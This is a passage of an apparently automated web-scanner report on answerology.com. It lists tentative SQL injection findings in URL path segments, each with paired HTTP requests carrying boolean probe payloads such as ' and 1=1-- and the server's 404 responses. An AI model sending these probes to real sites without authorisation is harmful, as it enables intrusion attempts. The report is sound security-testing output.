<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.27. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/marieclaire/MarieClaireLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/marieclaire'%20and%201%3d1--%20/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands/marieclaire'%20and%201%3d2--%20/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.28. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/quickandsimple/QuickAndSimpleLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10784842'%20or%201%3d1--%20 and 10784842'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/quickandsimple10784842'%20or%201%3d1--%20/QuickAndSimpleLayout.js?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:43:16 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands/quickandsimple10784842'%20or%201%3d2--%20/QuickAndSimpleLayout.js?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:43:17 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.29. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/redbookmag/RedbookmagLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/redbookmag'%20and%201%3d1--%20/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:48 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/redbookmag'%20and%201%3d2--%20/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.30. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/redbookmag/RedbookmagLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/redbookmag/RedbookmagLayout.js'%20and%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/redbookmag/RedbookmagLayout.js'%20and%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.31. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
